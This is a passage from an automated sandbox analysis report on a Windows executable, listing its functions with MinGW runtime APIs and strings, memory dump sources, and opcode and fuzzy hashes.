Instruction Fuzzy Hash: E001D6A2B1C68141E271EA12B8007FA7691EFCABD0F5442B5FE8E93B85CE3CD146C704

Non-executed Functions

Function 00007FF69AF15A66 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

signal.MSVCRT ref: 00007FF69AF15ACD
signal.MSVCRT ref: 00007FF69AF15B19
signal.MSVCRT ref: 00007FF69AF15B32
signal.MSVCRT ref: 00007FF69AF15C3A

Strings

CCG , xrefs: 00007FF69AF15A85

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 0c01f425e0de3a80f8f6df4b7973945bddacf8d6f645a1a3af4c393d19b37259
Instruction ID: 4c4f5c7bfa842ce533e29d2f8587c34d1c1fdd4d9a8bd13f573e8767b902dcc6
Opcode Fuzzy Hash: 0c01f425e0de3a80f8f6df4b7973945bddacf8d6f645a1a3af4c393d19b37259
Instruction Fuzzy Hash: 314150E0E1C4064AFAB8967944E437872C2DF99334F6986F6D52EC73E2DD2CA8C54212

Function 00007FF69AF13AF0 Relevance: 10.3, APIs: 8, Instructions: 301COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF69AF13B1B
memcpy.MSVCRT ref: 00007FF69AF13BCE

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 208cc540c86ecf185aff6cedb089ae9e2c58689e94542be7b88ff173d2c09013
Instruction ID: 348d7fa5030bf5eb484d6496250e26443178c7783e7c907d085b24d46806468b
Opcode Fuzzy Hash: 208cc540c86ecf185aff6cedb089ae9e2c58689e94542be7b88ff173d2c09013
Instruction Fuzzy Hash: 5CD1F2A1A1868699FBA1CB25E6083B977E0EF557C4F4480F5EA4C877A6EF3CE144C700

Function 00007FF69AF19290 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 1288COMMON

Download Yara Rule

Strings

, xrefs: 00007FF69AF1A79D

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 767a5258907ec4f12864d71057dd6e1fe1a67a83de83b5386605fb7f1dee2ead
Instruction ID: a80d8ccf2cb2f481d9fdcc17023b53a8e1adfe3c88b86cbdf2521d2712e3f9ab
Opcode Fuzzy Hash: 767a5258907ec4f12864d71057dd6e1fe1a67a83de83b5386605fb7f1dee2ead
Instruction Fuzzy Hash: 7BC2D6B2A1C6828BE771DF25A04077AB7E1FB85784F1081B5EA4A87B95DF3DE4418F40

Function 00007FF69B29D2A4 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e503ca6379582d288d94a70f38dda3bc98ca0c70a66edfc9791bf727c650d68e
Instruction ID: 5f210fc35c926b0cadc2f73f8591e19a563cd0377dbf86e0e434634825627246
Opcode Fuzzy Hash: e503ca6379582d288d94a70f38dda3bc98ca0c70a66edfc9791bf727c650d68e
Instruction Fuzzy Hash: 22F0F48BD0EBC619F26305B40F252691F90EB579A4B5C42FBCB68C22E7DD0D6E059315

Function 00007FF69AF14FE0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
Instruction ID: eed00bcefc1dc41991bfe796464762f629483bea3243fca70640af70a39b9b7a
Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
Instruction Fuzzy Hash: C7E0B6B6A08B85818614DB52F48005EBBA4F7D97C4B504916FECC57B19CF3CC1A08B80

Function 00007FF69AF1BA59 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cecf404510d40b0ebb1dd1b1368afb9df208dbfd33b8d4f7e94f1b7a0dc128a
Instruction ID: d72edb55074b76ca55bdabe567d77c122c1fe1eee7048fb5910d762db0bef034
Opcode Fuzzy Hash: 7cecf404510d40b0ebb1dd1b1368afb9df208dbfd33b8d4f7e94f1b7a0dc128a
Instruction Fuzzy Hash: 4CA00216D4EE0695E2112B009F02571512CDB0A280F0420B0C01C96062CD2CD2426214

Function 00007FF69AF16790 Relevance: 15.2, APIs: 10, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 00007FF69AF167DE
TlsGetValue.KERNEL32 ref: 00007FF69AF167E5
SetLastError.KERNEL32 ref: 00007FF69AF167F0

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: ErrorLast$Value
String ID:
API String ID: 1883355122-0
Opcode ID: 39baff2aec4dda407f8286b9c3e69d1a36ebd38e4dbff742ba3352efce0905ce
Instruction ID: 980b02ab19379bb4873c0b9454dd25eca8569f31f222276cd34a062e8590379c
Opcode Fuzzy Hash: 39baff2aec4dda407f8286b9c3e69d1a36ebd38e4dbff742ba3352efce0905ce
Instruction Fuzzy Hash: 3F614E71A09A0686EAB59F25AA0467933E1FF48B94F9881F5CD0DC77A0DF3DE942D340

Function 00007FF69AF15430 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00007FF69AF1554B

Strings

Mingw-w64 runtime failure:, xrefs: 00007FF69AF15467
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF69AF1566C
Address %p has no image-section, xrefs: 00007FF69AF154A5, 00007FF69AF15682
VirtualProtect failed with code 0x%x, xrefs: 00007FF69AF15622

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: d59ba3dbec2e58c2c275aa6aaa2c030797e1cca854e4e1fde868210a952c4168
Instruction ID: 8283d65ddd2e71b0fb4788087729ba30581a0dd61b1e3a5a6bc3ec46388b3393
Opcode Fuzzy Hash: d59ba3dbec2e58c2c275aa6aaa2c030797e1cca854e4e1fde868210a952c4168
Instruction Fuzzy Hash: AC61D2B2B1965686EB308B21EA442B977E1FB58B98F8441B5DE4C873A4EF3CE545C300

Function 00007FF69AF16AF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fwprintf.MSVCRT ref: 00007FF69AF16C3C

Strings

%-*.*S, xrefs: 00007FF69AF16C6E
%.*S, xrefs: 00007FF69AF16C5A
%*.*S, xrefs: 00007FF69AF16C35

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fwprintf
String ID: %*.*S$%-*.*S$%.*S
API String ID: 968622242-2115465065
Opcode ID: a2bac7666f7e135b15527277f3ebcc33ec3caf55eee56255511e73bfb8e46391
Instruction ID: fa4c48c54050bf0a84db448663f3d6d84067942396775b5ca7a5ff7c2ced67ba
Opcode Fuzzy Hash: a2bac7666f7e135b15527277f3ebcc33ec3caf55eee56255511e73bfb8e46391
Instruction Fuzzy Hash: 5541CFE3B08A4285E7B08A2598843B973D1EB94BA4F5881F5DE4CCB7C5DE3CE5428B00

Function 00007FF69AF15F20 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsSetValue.KERNEL32 ref: 00007FF69AF15F5C
TlsGetValue.KERNEL32 ref: 00007FF69AF15F3C

Part of subcall function 00007FF69AF15EE0: free.MSVCRT ref: 00007FF69AF15EFF

DeleteCriticalSection.KERNEL32 ref: 00007FF69AF15FB6

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: Value$CriticalDeleteSectionfree
String ID:
API String ID: 2588641659-0
Opcode ID: 49f64f6c62e17442bbbcb2cb5bf0c4d4c676a0f4463eaa64af3b7663c536e7a7
Instruction ID: 7a84f0b7d843a502d7093cf51ccd83c351469ccd6fe0e37e1519325d50e5a8fa
Opcode Fuzzy Hash: 49f64f6c62e17442bbbcb2cb5bf0c4d4c676a0f4463eaa64af3b7663c536e7a7
Instruction Fuzzy Hash: 7F31A1A4E1CA0B96FA309B20EB9463977A1EF58794F4800F5D40EC72B5DE3CEA84D744

Function 00007FF69AF16170 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_assert.MSVCRT ref: 00007FF69AF161AC
calloc.MSVCRT ref: 00007FF69AF161BB
TlsGetValue.KERNEL32 ref: 00007FF69AF161D5
TlsSetValue.KERNEL32 ref: 00007FF69AF161E8

Strings

../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF69AF16198
!dso || dso == &__dso_handle, xrefs: 00007FF69AF161A5

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: Value$_assertcalloc
String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
API String ID: 3698345500-799109717
Opcode ID: b9f03744ceb0dac37647cf4d5369f7f128c41602597cda0a6f9f4a1755017ffb
Instruction ID: 4e8205f93aa8a93329b9f8c666d185f1203282f116791a95b06d8bb443e38558
Opcode Fuzzy Hash: b9f03744ceb0dac37647cf4d5369f7f128c41602597cda0a6f9f4a1755017ffb
Instruction Fuzzy Hash: 2F014061B0964A86FA758B55FA446B562D0EF4C7D0F8840F4C91CC73A5EE2CAA91C700

Function 00007FF69AF16DA0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 109COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF69AF16EED
%-*.*s, xrefs: 00007FF69AF16F01
%*.*s, xrefs: 00007FF69AF16ECA

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 04f4ecb227f800f90691c90f72b122762c4425d4828b384464b353a568150eb3
Instruction ID: da6d2125e78e3fa0ff4c194d7be3de0504a9f02dcd67c98972c2d359d642d1b1
Opcode Fuzzy Hash: 04f4ecb227f800f90691c90f72b122762c4425d4828b384464b353a568150eb3
Instruction Fuzzy Hash: 6341A3F2A18A5685E7F09F25C500679B7D1EB40764F54C2F4EE0DCB284EE3DA501CB00

Function 00007FF69AF16690 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF69AF166AB
memcpy.MSVCRT ref: 00007FF69AF166CB
malloc.MSVCRT ref: 00007FF69AF166E5
memset.MSVCRT ref: 00007FF69AF1670F
abort.MSVCRT(?,00000000,?,00007FF69AF16821), ref: 00007FF69AF16722

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: malloc$abortmemcpymemset
String ID:
API String ID: 4174897659-0
Opcode ID: 79e8ea0033ef1d9cab58d50f6e3ce57b37834047a87369d50b3562e8180e8def
Instruction ID: 9638461bb48de107de08ee6999a6d3f98fa9993e7a85a2f2df0d3d13153c8fd5
Opcode Fuzzy Hash: 79e8ea0033ef1d9cab58d50f6e3ce57b37834047a87369d50b3562e8180e8def
Instruction Fuzzy Hash: 810108A2F05A4484E9649B56E5409F976E1EF58FD4FC481B5DE1C57381EE3CE982C300

Function 00007FF69AF160C0 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 00007FF69AF1610B
EnterCriticalSection.KERNEL32 ref: 00007FF69AF16126
LeaveCriticalSection.KERNEL32 ref: 00007FF69AF16145

Strings

../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c, xrefs: 00007FF69AF160E8
!dso || dso == &__dso_handle, xrefs: 00007FF69AF160F5

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: CriticalSection$EnterLeavecalloc
String ID: !dso || dso == &__dso_handle$../../src/mingw-w64/mingw-w64-crt/crt/tls_atexit.c
API String ID: 876395260-799109717
Opcode ID: 25d7586f7b1ee07523810b07f0050bf2b3b62a312bfb78454b13e963260707ed
Instruction ID: 54387b80dc0af3bc43a31269a743807882a2cbe1e83bc5a3fc23cbd3de37476d
Opcode Fuzzy Hash: 25d7586f7b1ee07523810b07f0050bf2b3b62a312bfb78454b13e963260707ed
Instruction Fuzzy Hash: 9B01F361A08A0A85FA719B55FB442B523D0EF4CB90FC440B1C91CC33B5EE2DEA86C704

Function 00007FF69AF156A0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(00007FF69B29CC28,00007FF69B29C080,00007FF69B29CC20,00007FF8C6F6ADA0,?,?,?,00000001,00007FF69AF1124C), ref: 00007FF69AF1585D

Part of subcall function 00007FF69AF154A0: VirtualQuery.KERNEL32 ref: 00007FF69AF1554B

Strings

Unknown pseudo relocation protocol version %d., xrefs: 00007FF69AF15A02
Unknown pseudo relocation bit size %d., xrefs: 00007FF69AF159DA
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF69AF159F3

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: Virtual$ProtectQuery
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 1027372294-1286557213
Opcode ID: 292a409c12c2be412fd72ce858b4461e270ab671a445d16a1f74d55113fbf21c
Instruction ID: 474b68ca9b29b55116e18ea5c2cae1b86d03f6f35c6c64beeda2505516c65c6d
Opcode Fuzzy Hash: 292a409c12c2be412fd72ce858b4461e270ab671a445d16a1f74d55113fbf21c
